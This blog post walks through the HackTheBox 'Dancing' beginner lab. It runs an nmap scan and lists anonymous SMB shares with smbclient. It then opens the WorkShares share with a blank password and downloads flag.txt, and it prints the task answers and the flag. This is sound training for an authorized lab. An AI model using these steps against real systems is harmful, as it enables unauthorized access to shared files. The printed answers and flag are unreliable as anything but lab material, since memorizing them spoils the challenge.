Dancing Starting Point HackTheBox Walkthrough/Writeup

protonsec
3 min readJul 25, 2022
Dancing Starting Point HackTheBox Walkthrough
Dancing Starting Point HackTheBox Walkthrough

Dancing is a very impressive challenge by HackTheBox for pacticing hacking skills. If you want Video Solution the visit the following video for English Version

And for Hindi Version(हिंदी में)

Now let’s continue our writeup.

Dancing Starting Point HackTheBox Walkthrough
Dancing Starting Point HackTheBox Walkthrough

Fire up the terminal and scan the target like

wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 11:21 IST
Nmap scan report for target_ip
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.25 seconds

From the scan results we came to some valuable outputs

PORT    STATE SERVICE       VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now, simple google search brings us to the

TASK 1What does the 3-letter acronym SMB stand for?
Server Message Block

From our scan results can see that microsoft-ds is running on port 445

TASK 2What port does SMB use to operate at?
445

The scan result shows the service name

TASK 3What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds

To list the contents of the share -L flag is used in SMB tool

TASK 4What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
-L

Now let’s use smbclient to connect to SMB

wesecure1337@kali:~$ smbclient -L //{target_ip}}
Password for [WORKGROUP\wesecure1337]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.149.40 failed (Error NT_STATUS_RESOURCE_NAME_
Unable to connect with SMB1 -- no workgroup available

When prompted for password, just press Enter , it will list the shares

Now we have shares, after trying to connect to shares, only WorkShares is accessible

wesecure1337@kali:~$ smbclient //10.129.149.40/WorkShares
Password for [WORKGROUP\naveen]:
Try "help" to get a list of possible commands.
smb: \>

This brings us to

TASK 5What is the name of the share we are able to access in the end with a blank password?
WorkShares

Let’s dig what inside

smb: \> ls
. D 0 Mon Mar 29 13:52:01 2021
.. D 0 Mon Mar 29 13:52:01 2021
Amy.J D 0 Mon Mar 29 14:38:24 2021
James.P D 0 Thu Jun 3 14:08:03 2021
5114111 blocks of size 4096. 1753130 blocks available
smb: \> cd James.P
smb: \James.P\>
smb: \James.P\> ls
. D 0 Thu Jun 3 14:08:03 2021
.. D 0 Thu Jun 3 14:08:03 2021
flag.txt A 32 Mon Mar 29 14:56:57 2021
5114111 blocks of size 4096. 1752618 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\>exit
wesecure1337@kali:~$ ls
flag.txt
wesecure1337@kali:~$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664

Here get command is used to get the flag.txt file to our local machine.

Now

TASK 6What is the command we can use within the SMB shell to download the files we find?
get

And finally submit flag to complete the Challenge

SUBMIT FLAG
Submit root flag
5f61c10dffbc77a704d76016a22f1664

Voila! We have completed the Dancing challenge by HackTheBox. If you really enjoyed the Writeup and excited, do checkout our other Writeups[Walkthrough].

Let’s get connected

Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec

If you want to appreciate and support my work here you go…

Thanks for Reading!!!

--

--